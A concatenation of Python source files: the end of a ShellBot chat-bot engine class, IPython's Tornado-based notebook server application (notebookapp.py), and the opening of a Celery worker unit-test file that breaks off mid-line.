self.bots[bot.id] = bot
self.set('bots.ids', self.bots.keys()) # for the observer
bot.bond()
bot.on_enter()
return bot
def build_bot(self, id=None, driver=ShellBot):
"""
Builds a new bot
:param id: The unique id of the target space
:type id: str
:return: a ShellBot instance, or None
This function receives the id of a chat space, and returns
the related bot.
"""
logging.debug(u"- building bot instance")
bot = driver(engine=self, channel_id=id)
self.initialize_store(bot=bot)
bot.machine = self.build_machine(bot=bot)
self.on_build(bot)
return bot
def on_build(self, bot):
"""
Extends the building of a new bot instance
:param bot: a new bot instance
:type bot: ShellBot
Provide your own implementation in a sub-class where required.
Example::
on_build(self, bot):
bot.secondary_machine = Input(...)
"""
pass
def build_store(self, channel_id=None):
"""
Builds a store for this bot
:param channel_id: Identifier of the target chat space
:type channel_id: str
:return: a Store instance, or None
This function receives an identifier, and returns
a store bound to it.
"""
logging.debug(u"- building data store")
return StoreFactory.get(type='memory')
def initialize_store(self, bot):
"""
Copies engine settings to the bot store
"""
logging.debug(u"Initializing bot store")
settings = self.get('bot.store', {})
if settings:
logging.debug(u"- initializing store from general settings")
for (key, value) in settings.items():
bot.store.remember(key, value)
if bot.id:
label = "store.{}".format(bot.id)
settings = self.get(label, {})
if settings:
logging.debug(u"- initializing store from bot settings")
for (key, value) in settings.items():
bot.store.remember(key, value)
def build_machine(self, bot):
"""
Builds a state machine for this bot
:param bot: The target bot
:type bot: ShellBot
:return: a Machine instance, or None
This function receives a bot, and returns
a state machine bound to it.
"""
if self.machine_factory:
logging.debug(u"- building state machine")
machine = self.machine_factory.get_machine(bot=bot)
return machine
return None
def build_updater(self, id):
"""
Builds an updater for this channel
:param id: The identifier of an audited channel
:type id: str
:return: an Updater instance, or None
This function receives a bot, and returns
a state machine bound to it.
"""
if self.updater_factory:
logging.debug(u"- building updater")
updater = self.updater_factory.get_updater(id=id)
return updater
return None
def on_enter(self, join):
"""
Bot has been invited to a chat space
:param join: The join event received from the chat space
:type join: Join
Provide your own implementation in a sub-class where required.
Example::
on_enter(self, join):
mailer.post(u"Invited to {}".format(join.space_title))
"""
pass
def on_exit(self, leave):
"""
Bot has been kicked off from a chat space
:param leave: The leave event received from the chat space
:type leave: Leave
Provide your own implementation in a sub-class where required.
Example::
on_exit(self, leave):
mailer.post(u"Kicked off from {}".format(leave.space_title))
"""
pass
|
notebookapp.py
|
# coding: utf-8
"""A tornado based IPython notebook server.
Authors:
* Brian Granger
"""
from __future__ import print_function
#-----------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# stdlib
import errno
import io
import json
import logging
import os
import random
import select
import signal
import socket
import sys
import threading
import time
import webbrowser
# Third party
# check for pyzmq 2.1.11
from IPython.utils.zmqrelated import check_for_zmq
check_for_zmq('2.1.11', 'IPython.html')
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 3.1.0
msg = "The IPython Notebook requires tornado >= 3.1.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (3, 1, 0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
# Our own libraries
from IPython.html import DEFAULT_STATIC_FILES_PATH
from .base.handlers import Template404
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager
from .services.notebooks.nbmanager import NotebookManager
from .services.notebooks.filenbmanager import FileNotebookManager
from .services.clusters.clustermanager import ClusterManager
from .services.sessions.sessionmanager import SessionManager
from .base.handlers import AuthenticatedFileHandler, FileFindHandler
from IPython.config.application import catch_config_error, boolean_flag
from IPython.core.application import BaseIPythonApplication
from IPython.core.profiledir import ProfileDir
from IPython.consoleapp import IPythonConsoleApp
from IPython.kernel import swallow_argv
from IPython.kernel.zmq.session import default_secure
from IPython.kernel.zmq.kernelapp import (
kernel_flags,
kernel_aliases,
)
from IPython.nbformat.sign import NotebookNotary
from IPython.utils.importstring import import_item
from IPython.utils.localinterfaces import localhost
from IPython.utils import submodule
from IPython.utils.traitlets import (
Dict, Unicode, Integer, List, Bool, Bytes,
DottedObjectName, TraitError,
)
from IPython.utils import py3compat
from IPython.utils.path import filefind, get_ipython_dir
from .utils import url_path_join
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_examples = """
ipython notebook # start the notebook
ipython notebook --profile=sympy # use the sympy profile
ipython notebook --certfile=mycert.pem # use SSL/TLS certificate
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n - 5):
yield max(1, port + random.randint(-2 * n, 2 * n))
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
name = 'IPython.html.' + name
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, ipython_app, kernel_manager, notebook_manager,
cluster_manager, session_manager, log, base_url,
settings_overrides, jinja_env_options):
settings = self.init_settings(
ipython_app, kernel_manager, notebook_manager, cluster_manager,
session_manager, log, base_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
super(NotebookWebApplication, self).__init__(handlers, **settings)
def init_settings(self, ipython_app, kernel_manager, notebook_manager,
cluster_manager, session_manager, log, base_url,
settings_overrides, jinja_env_options=None):
# Python < 2.6.5 doesn't accept unicode keys in f(**kwargs), and
# base_url will always be unicode, which will in turn
# make the patterns unicode, and ultimately result in unicode
# keys in kwargs to handler._execute(**kwargs) in tornado.
# This enforces that base_url be ascii in that situation.
#
# Note that the URLs these patterns check against are escaped,
# and thus guaranteed to be ASCII: 'héllo' is really 'h%C3%A9llo'.
base_url = py3compat.unicode_to_str(base_url, 'ascii')
template_path = settings_overrides.get(
"template_path", os.path.join(os.path.dirname(__file__), "templates"))
jenv_opt = jinja_env_options if jinja_env_options else {}
env = Environment(loader=FileSystemLoader(template_path), **jenv_opt)
settings = dict(
# basics
log_function=log_request,
base_url=base_url,
template_path=template_path,
static_path=ipython_app.static_file_path,
static_handler_class=FileFindHandler,
static_url_prefix=url_path_join(base_url, '/static/'),
# authentication
cookie_secret=ipython_app.cookie_secret,
login_url=url_path_join(base_url, '/login'),
password=ipython_app.password,
# managers
kernel_manager=kernel_manager,
notebook_manager=notebook_manager,
cluster_manager=cluster_manager,
session_manager=session_manager,
# IPython stuff
nbextensions_path=ipython_app.nbextensions_path,
mathjax_url=ipython_app.mathjax_url,
config=ipython_app.config,
jinja2_env=env,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
# Load the (URL pattern, handler) tuples for each component.
handlers = []
handlers.extend(load_handlers('base.handlers'))
handlers.extend(load_handlers('tree.handlers'))
handlers.extend(load_handlers('auth.login'))
handlers.extend(load_handlers('auth.logout'))
handlers.extend(load_handlers('notebook.handlers'))
handlers.extend(load_handlers('nbconvert.handlers'))
handlers.extend(load_handlers('services.kernels.handlers'))
handlers.extend(load_handlers('services.notebooks.handlers'))
handlers.extend(load_handlers('services.clusters.handlers'))
handlers.extend(load_handlers('services.sessions.handlers'))
handlers.extend(load_handlers('services.nbconvert.handlers'))
# FIXME: /files/ should be handled by the Contents service when it
# exists
nbm = settings['notebook_manager']
if hasattr(nbm, 'notebook_dir'):
handlers.extend([
(r"/files/(.*)", AuthenticatedFileHandler,
{'path': nbm.notebook_dir}),
(r"/nbextensions/(.*)", FileFindHandler,
{'path': settings['nbextensions_path']}),
])
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
class NbserverListApp(BaseIPythonApplication):
description = "List currently running notebook servers in this profile."
flags = dict(
json=({'NbserverListApp': {'json': True}},
"Produce machine-readable JSON output."),
)
json = Bool(False, config=True,
help="If True, each line of output will be a JSON object with the "
"details from the server info file.")
def start(self):
if not self.json:
print("Currently running servers:")
for serverinfo in list_running_servers(self.profile):
if self.json:
print(json.dumps(serverinfo))
else:
print(serverinfo['url'], "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(kernel_flags)
flags['no-browser'] = (
{'NotebookApp': {'open_browser': False}},
"Don't open the notebook in a browser after startup."
)
flags['no-mathjax'] = (
{'NotebookApp': {'enable_mathjax': False}},
"""Disable MathJax
MathJax is the javascript library IPython uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileNotebookManager.save_script',
'Auto-save a .py script everytime the .ipynb notebook is saved',
'Do not auto-save .py scripts for every notebook'))
# the flags that are specific to the frontend
# these must be scrubbed before being passed to the kernel,
# or it will raise an error on unrecognized flags
notebook_flags = ['no-browser', 'no-mathjax', 'script', 'no-script']
aliases = dict(kernel_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
})
# remove ipkernel flags that are singletons, and don't make sense in
# multi-kernel evironment:
aliases.pop('f', None)
notebook_aliases = [u'port', u'port-retries', u'ip', u'keyfile', u'certfile',
u'notebook-dir', u'profile', u'profile-dir']
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(BaseIPythonApplication):
name = 'ipython-notebook'
description = """
The IPython HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an
HTML5/Javascript Notebook client.
"""
examples = _examples
classes = IPythonConsoleApp.classes + [MappingKernelManager, NotebookManager,
FileNotebookManager, NotebookNotary]
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
)
kernel_argv = List(Unicode)
def _log_level_default(self):
return logging.INFO
def _log_format_default(self):
"""override default log format to include time"""
return u"%(asctime)s.%(msecs).03d [%(name)s]%(highlevel)s %(message)s"
# create requested profiles by default, if they don't exist:
auto_create = Bool(True)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
def _file_to_run_changed(self, name, old, new):
path, base = os.path.split(new)
if path:
self.file_to_run = base
self.notebook_dir = path
# Network related information.
ip = Unicode(config=True,
help="The IP address the notebook server will listen on."
)
def _ip_default(self):
return localhost()
def _ip_changed(self, name, old, new):
if new == u'*':
self.ip = u''
port = Integer(8888, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
def _cookie_secret_default(self):
return os.urandom(1024)
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from IPython.lib import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webapp_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"IPython notebook uses.")
jinja_environment_options = Dict(config=True,
help="Supply extra arguments that will be passed to Jinja environment.")
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library IPython uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
def _enable_mathjax_changed(self, name, old, new):
"""set mathjax url to empty if mathjax is disabled"""
if not new:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
def _base_url_changed(self, name, old, new):
if not new.startswith('/'):
self.base_url = '/' + new
elif not new.endswith('/'):
self.base_url = new + '/'
base_project_url = Unicode(
'/', config=True, help="""DEPRECATED use base_url""")
def _base_project_url_changed(self, name, old, new):
self.log.warn("base_project_url is deprecated, use base_url")
self.base_url = new
extra_static_paths = List(Unicode, config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
def _extra_static_paths_default(self):
return [os.path.join(self.profile_dir.location, 'static')]
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
nbextensions_path = List(Unicode, config=True,
help="""paths for Javascript extensions. By default, this is just IPYTHONDIR/nbextensions"""
)
def _nbextensions_path_default(self):
return [os.path.join(get_ipython_dir(), 'nbextensions')]
mathjax_url = Unicode("", config=True,
help="""The url for MathJax.js."""
)
def _mathjax_url_default(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.webapp_settings.get("static_url_prefix",
url_path_join(
self.base_url, "static")
)
# try local mathjax, either in nbextensions/mathjax or static/mathjax
for (url_prefix, search_path) in [
(url_path_join(self.base_url, "nbextensions"),
self.nbextensions_path),
(static_url_prefix, self.static_file_path),
]:
self.log.debug("searching for local mathjax in %s", search_path)
try:
mathjax = filefind(
os.path.join('mathjax', 'MathJax.js'), search_path)
except IOError:
continue
else:
url = url_path_join(url_prefix, u"mathjax/MathJax.js")
self.log.info(
"Serving local MathJax from %s at %s", mathjax, url)
return url
# no local mathjax, serve from CDN
if self.certfile:
# HTTPS: load from Rackspace CDN, because SSL certificate requires
# it
host = u"https://c328740.ssl.cf1.rackcdn.com"
else:
host = u"http://cdn.mathjax.org"
url = host + u"/mathjax/latest/MathJax.js"
self.log.info("Using MathJax from CDN: %s", url)
return url
def _mathjax_url_changed(self, name, old, new):
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info("Using MathJax: %s", new)
notebook_manager_class = DottedObjectName('IPython.html.services.notebooks.filenbmanager.FileNotebookManager',
config=True,
help='The notebook manager class to use.')
trust_xheaders = Bool(False, config=True,
help=("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL")
)
info_file = Unicode()
def _info_file_default(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.profile_dir.security_dir, info_file)
notebook_dir = Unicode(py3compat.getcwd(), config=True,
help="The directory to use for notebooks and kernels."
)
def _notebook_dir_changed(self, name, old, new):
"""Do a bit of validation of the notebook dir."""
if not os.path.isabs(new):
# If we receive a non-absolute path, make it absolute.
self.notebook_dir = os.path.abspath(new)
return
if not os.path.isdir(new):
raise TraitError("No such notebook dir: %r" % new)
# setting App.notebook_dir implies setting notebook and kernel dirs as
# well
self.config.FileNotebookManager.notebook_dir = new
self.config.MappingKernelManager.root_dir = new
def parse_command_line(self, argv=None):
super(NotebookApp, self).parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical("No such file or directory: %s", f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the profile.
if os.path.isdir(f):
self.config.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
self.config.NotebookApp.file_to_run = f
def init_kernel_argv(self):
"""construct the kernel arguments"""
# Scrub frontend-specific flags
self.kernel_argv = swallow_argv(
self.argv, notebook_aliases, notebook_flags)
if any(arg.startswith(u'--pylab') for arg in self.kernel_argv):
self.log.warn('\n '.join([
"Starting all kernels in pylab mode is not recommended,",
"and will be disabled in a future release.",
"Please use the %matplotlib magic to enable matplotlib instead.",
"pylab implies many imports, which can have confusing side effects",
"and harm the reproducibility of your notebooks.",
]))
# Kernel should inherit default config file from frontend
self.kernel_argv.append(
"--IPKernelApp.parent_appname='%s'" % self.name)
# Kernel should get *absolute* path to profile directory
self.kernel_argv.extend(["--profile-dir", self.profile_dir.location])
def init_configurables(self):
# force Session default to be secure
default_secure(self.config)
self.kernel_manager = MappingKernelManager(
parent=self, log=self.log, kernel_argv=self.kernel_argv,
connection_dir=self.profile_dir.security_dir,
)
kls = import_item(self.notebook_manager_class)
self.notebook_manager = kls(parent=self, log=self.log)
self.session_manager = SessionManager(parent=self, log=self.log)
self.cluster_manager = ClusterManager(parent=self, log=self.log)
self.cluster_manager.update_profiles()
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dipatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
# hook up tornado 3's loggers to our app handlers
for name in ('access', 'application', 'general'):
logger = logging.getLogger('tornado.%s' % name)
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.notebook_manager,
self.cluster_manager, self.session_manager,
self.log, self.base_url, self.webapp_settings,
self.jinja_environment_options
)
if self.certfile:
ssl_options = dict(certfile=self.certfile)
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
else:
ssl_options = None
self.web_app.password = self.password
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
if not self.ip:
warning = "WARNING: The notebook server is listening on all IP addresses"
if ssl_options is None:
self.log.critical(warning + " and not using encryption. This "
"is not recommended.")
if not self.password:
self.log.critical(warning + " and not using authentication. "
"This is highly insecure and not recommended.")
success = None
for port in random_ports(self.port, self.port_retries + 1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(
'The port %i is already in use, trying another random port.' % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warn(
"Permission to listen on port %i denied" % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
@property
def display_url(self):
ip = self.ip if self.ip else '[all ip addresses on your system]'
return self._url(ip)
@property
def connection_url(self):
ip = self.ip if self.ip else localhost()
return self._url(ip)
def _url(self, ip):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
def init_signal(self):
if not sys.platform.startswith('win'):
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
# FIXME: remove this delay when pyzmq dependency is >= 2.1.11
time.sleep(0.1)
info = self.log.info
info('interrupted')
print(self.notebook_info())
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r, w, x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y'):
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.instance().stop()
return
else:
print("No answer for 5s:", end=' ')
print("resuming operation...")
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.instance().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.instance().stop()
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
status = submodule.check_submodule_status()
if status == 'missing':
self.log.warn(
"components submodule missing, running `git submodule update`")
submodule.update_submodules(submodule.ipython_parent())
elif status == 'unclean':
self.log.warn(
"components submodule unclean, you may see 404s on static/components")
self.log.warn(
"run `setup.py submodule` or `git submodule update` to update")
@catch_config_error
def initialize(self, argv=None):
super(NotebookApp, self).initialize(argv)
self.init_logging()
self.init_kernel_argv()
self.init_configurables()
self.init_components()
self.init_webapp()
self.init_signal()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
info = self.notebook_manager.info_string() + "\n"
info += "%d active kernels \n" % len(self.kernel_manager._kernels)
return info + "The IPython Notebook is running at: %s" % self.display_url
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'secure': bool(self.certfile),
'base_url': self.base_url,
'notebook_dir': os.path.abspath(self.notebook_dir),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def start(self):
""" Start the IPython Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
if self.subapp is not None:
return self.subapp.start()
info = self.log.info
for line in self.notebook_info().split("\n"):
info(line)
info(
"Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).")
self.write_server_info_file()
if self.open_browser or self.file_to_run:
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warn('No web browser found: %s.' % e)
browser = None
if self.file_to_run:
fullpath = os.path.join(self.notebook_dir, self.file_to_run)
if not os.path.exists(fullpath):
self.log.critical("%s does not exist" % fullpath)
self.exit(1)
uri = url_path_join('notebooks', self.file_to_run)
else:
uri = 'tree'
if browser:
b = lambda: browser.open(url_path_join(self.connection_url, uri),
new=2)
threading.Thread(target=b).start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.cleanup_kernels()
self.remove_server_info_file()
def list_running_servers(profile='default'):
"""Iterate over the server info files of running notebook servers.
Given a profile name, find nbserver-* files in the security directory of
that profile, and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
pd = ProfileDir.find_profile_dir_by_name(get_ipython_dir(), name=profile)
for file in os.listdir(pd.security_dir):
if file.startswith('nbserver-'):
with io.open(os.path.join(pd.security_dir, file), encoding='utf-8') as f:
yield json.load(f)
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
launch_new_instance = NotebookApp.launch_instance
|
test_worker.py
|
import socket
import sys
from datetime import datetime, timedelta
from Queue import Empty
from kombu.transport.base import Message
from kombu.connection import BrokerConnection
from celery.utils.timer2 import Timer
from celery import current_app
from celery.concurrency.base import BasePool
from celery.exceptions import SystemTerminate
from celery.task import task as task_dec
from celery.task import periodic_task as periodic_task_dec
from celery.utils import timer2
from celery.utils import gen_unique_id
from celery.worker import WorkController
from celery.worker.buckets import FastQueue
from celery.worker.job import TaskRequest
from celery.worker.consumer import Consumer as MainConsumer
from celery.worker.consumer import QoS, RUN, PREFETCH_COUNT_MAX
from celery.utils.serialization import pickle
from celery.tests.compat import catch_warnings
from celery.tests.utils import unittest
from celery.tests.utils import AppCase, execute_context, skip
class MockConsumer(object):
class Channel(object):
def close(self):
pass
def register_callback(self, cb):
pass
def consume(self):
pass
@property
def channel(self):
return self.Channel()
class PlaceHolder(object):
pass
class MyKombuConsumer(MainConsumer):
broadcast_consumer = MockConsumer()
task_consumer = MockConsumer()
def __init__(self, *args, **kwargs):
kwargs.setdefault("pool", BasePool(2))
super(MyKombuConsumer, self).__init__(*args, **kwargs)
def restart_heartbeat(self):
self.heart = None
class MockNode(object):
commands = []
def handle_message(self, body, message):
self.commands.append(body.pop("command", None))
class MockEventDispatcher(object):
sent = []
closed = False
flushed = False
_outbound_buffer = []
def send(self, event, *args, **kwargs):
self.sent.append(event)
def close(self):
self.closed = True
def flush(self):
self.flushed = True
class MockHeart(object):
closed = False
def stop(self):
self.closed = True
@task_dec()
def foo_task(x, y, z, **kwargs):
return x * y * z
@periodic_task_dec(run_every=60)
def foo_periodic_task():
return "foo"
class MockLogger(object):
def __init__(self):
self.logged = []
def critical(self, msg, *args, **kwargs):
self.logged.append(msg)
def info(self, msg, *args, **kwargs):
self.logged.append(msg)
def error(self, msg, *args, **kwargs):
self.logged.append(msg)
def debug(self, msg, *args, **kwargs):
self.logged.append(msg)
class MockBackend(object):
_acked = False
def basic_ack(self, delivery_tag):
self._acked = True
class MockPool(BasePool):
_terminated = False
_stopped = False
def __init__(self, *args, **kwargs):
self.raise_regular = kwargs.get("raise_regular", False)
self.raise_base = kwargs.get("raise_base", False)
self.raise_SystemTerminate = kwargs.get("raise_SystemTerminate",
False)
def apply_async(self, *args, **kwargs):
if self.raise_regular:
raise KeyError("some exception")
if self.raise_base:
raise KeyboardInterrupt("Ctrl+c")
if self.raise_SystemTerminate:
raise SystemTerminate()
def start(self):
pass
def stop(self):
self._stopped = True
return True
def terminate(self):
self._terminated = True
self.stop()
class MockController(object):
def __init__(self, w, *args, **kwargs):
self._w = w
self._stopped = False
def start(self):
self._w["started"] = True
self._stopped = False
def stop(self):
self._stopped = True
def create_message(backend, **data):
data.setdefault("id", gen_unique_id())
return Message(backend, body=pickle.dumps(dict(**data)),
content_type="application/x-python-serialize",
content_encoding="binary")
class test_QoS(unittest.TestCase):
class _QoS(QoS):
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value, None)
def set(self, value):
return value
def test_qos_increment_decrement(self):
qos = self._QoS(10)
self.assertEqual(qos.increment(), 11)
self.assertEqual(qos.increment(3), 14)
self.assertEqual(qos.increment(-30), 14)
self.assertEqual(qos.decrement(7), 7)
self.assertEqual(qos.decrement(), 6)
self.assertRaises(AssertionError, qos.decrement, 10)
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
self.assertEqual(qos.increment(), 0)
self.assertEqual(qos.increment(3), 0)
self.assertEqual(qos.increment(-30), 0)
self.assertEqual(qos.decrement(7), 0)
self.assertEqual(qos.decrement(), 0)
self.assertEqual(qos.decrement(10), 0)
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in xrange(1000):
qos.increment()
def sub():
for i in xrange(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
self.assertEqual(qos.value, 2010)
qos.value = 1000
threaded([add, sub]) # n = 2
self.assertEqual(qos.value, 1000)
class MockConsumer(object):
prefetch_count = 0
def qos(self, prefetch_size=0, prefetch_count=0, apply_global=False):
self.prefetch_count = prefetch_count
def test_exceeds_short(self):
consumer = self.MockConsumer()
qos = QoS(consumer, PREFETCH_COUNT_MAX - 1,
current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX + 1)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
def test_consumer_increment_decrement(self):
consumer = self.MockConsumer()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, 10)
self.assertEqual(consumer.prefetch_count, 10)
qos.decrement()
self.assertEqual(qos.value, 9)
self.assertEqual(consumer.prefetch_count, 9)
qos.decrement_eventually()
self.assertEqual(qos.value, 8)
self.assertEqual(consumer.prefetch_count, 9)
# Does not decrement 0 value
qos.value = 0
qos.decrement()
self.assertEqual(qos.value, 0)
qos.increment()
self.assertEqual(qos.value, 0)
class test_Consumer(unittest.TestCase):
def setUp(self):
self.ready_queue = FastQueue()
self.eta_schedule = Timer()
self.logger = current_app.log.get_default_logger()
self.logger.setLevel(0)
def tearDown(self):
self.eta_schedule.stop()
def test_info(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
